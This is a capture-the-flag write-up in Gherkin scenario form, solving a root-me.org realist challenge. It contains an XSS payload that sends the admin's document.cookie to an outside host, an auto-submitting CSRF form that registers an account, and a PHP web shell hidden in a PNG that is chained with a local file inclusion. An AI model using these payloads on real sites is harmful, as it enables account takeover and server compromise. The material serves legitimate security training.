## Version 2.0
## language: en

Feature:
  Site:
    root-me.org
  Category:
    Realist
  User:
    mr_once
  Goal:
    Capture the flag

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Arch Linux      | 2020.07.01  |
    | Firefox         | 78.0.2      |
    | Python          | 3.8.3       |
  Machine information:
    Given I am accessing the page at
    """
    http://challenge01.root-me.org/realiste/ch16/
    """
    And it looks like a CMS

  Scenario: Fail:Exploit LFI
    Given I am on the site
    And I notice that the links are in the form
    """
    http://challenge01.root-me.org/realiste/ch16/?page=contact.php
    """
    When I try to append a single quote to the url
    """
    http://challenge01.root-me.org/realiste/ch16/?page=contact.php'
    """
    Then I can see the following warning:
    """
    Warning: include(pages/contact.php'): failed to open stream: No such\
      file or directory in /challenge/realiste/ch16/index.php on line 80\
      Warning: include(): Failed opening 'pages/contact.php'' for inclusion\
      (include_path='.:/opt/phpfarm/inst/php-5.5.9/pear/php/') in\
      /challenge/realiste/ch16/index.php on line 80
    """
    Then I realice the site it's vulnerable to LFI
    But I can not exploit it alone since I can't use php filters

  Scenario: Fail:Steal admin's cookie
    Given that I see a contact form
    Then I try a CSRF attack
    And I send the admin the link to my website where I log all connections
    """
    <script>
      document.location="http://myweb.com/?c=vulnerable";
    </script>
    """
    And after a few minutes I see on the logs that the admin was there
    And I try to steal admin's cookie sending him the message
    """
    <script>
      document.location="http://miweb.com/?c=".concat(document.cookie);
    </script>
    """
    When I take a look into the logs
    Then I see that I did not steal the cookie
    But now I know the site is vulnerable to CSRF

  Scenario: Fail:Create an account via mysite
    Given everything so far has failed
    Then I tried to create an account to try a different vector attack
    But I see that only the admin can create new accounts
    And I tried to use the CSRF to make the admin do the work for me
    And I added the following script to my page
    """
    <html>
        <form action="http://challenge01.root-me.org/realiste/ch16/
          index.php?page=register.php" method="post" id="form">
          <input type="username" name="username" value="asd" />
          <input type="password" name="password" value="asd" />
        <!--button id="submit">Submit</button-->
      </form>

      <?php
          echo '<script>document.getElementById("form").submit();</script>';
      ?>
    </html>
    """
    But it does not work

  Scenario: Success:Create an account via contact form
    Given that above mentioned attack did not work
    Then I try just to send the code via the contact form
    """
    <html>
        <form action="http://challenge01.root-me.org/realiste/ch16/
          index.php?page=register.php" method="post" id="form">
          <input type="username" name="username" value="asd" />
          <input type="password" name="password" value="asd" />
        <!--button id="submit">Submit</button-->
      </form>

      <script>
        document.getElementById("form").submit();
      </script>
    </html>
    """
    And after a few minutes I can log in with the credentials "asd":"asd"

  Scenario: Success:Upload a malicious PNG file
    Given that now I am logged in the system
    And the site asks me to upload a profile's picture in PNG format
    Then I tried to upload the file "payload.png"
    """
    <?php phpinfo(); ?>
    """
    And I see the following error [evidence](pngerror.png)
    And I noticed an error related to the function "imagecreatefrompng()"
    And that it looks like the site its changing the image's name randomly
    When I look for a way to bypass "imagecreatefrompng()"
    Then I found this blog entry
    """
    www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
    """
    And I try that but the method described only works for small images
    Then I found this repo implementing the above method in perl
    """
    https://github.com/chinarulezzz/pixload
    """
    And I tried to modify the script to generate larger images
    But the payload does not work
    Then I found this blog entry
    """
    https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/
    """
    And it is explained how to generate a bigger working payload

  Scenario: Success:Code script that uploads the photo an executes the LFI
    Given now I can upload malicious PHP code inside the PNG files
    And use that together with the LFI to get CE
    But the image gets deleted every few minutes and I have to upload it again
    Then I decided to code "script.py" to automate this process
    When I run
    """
    python script.py system ls
    """
    Then I get the following warning
    """
    Warning: system() has been disabled for security reasons in
      /challenge/realiste/ch16/upload/coLt3vWMwWgLhNO.png on line 4
    """
    And I try to read "login.php" using php built-in function file_get_contents
    And I see the page includes the file "config.php" [evidence](login.php)
    When I read "config.php" code
    Then I found the BD credentials [evidence](config.php)
    But they dont work to validate the challenge
    And when I look into "index.php" I see the flag [evidence](flag.png)
    And I solve the challenge
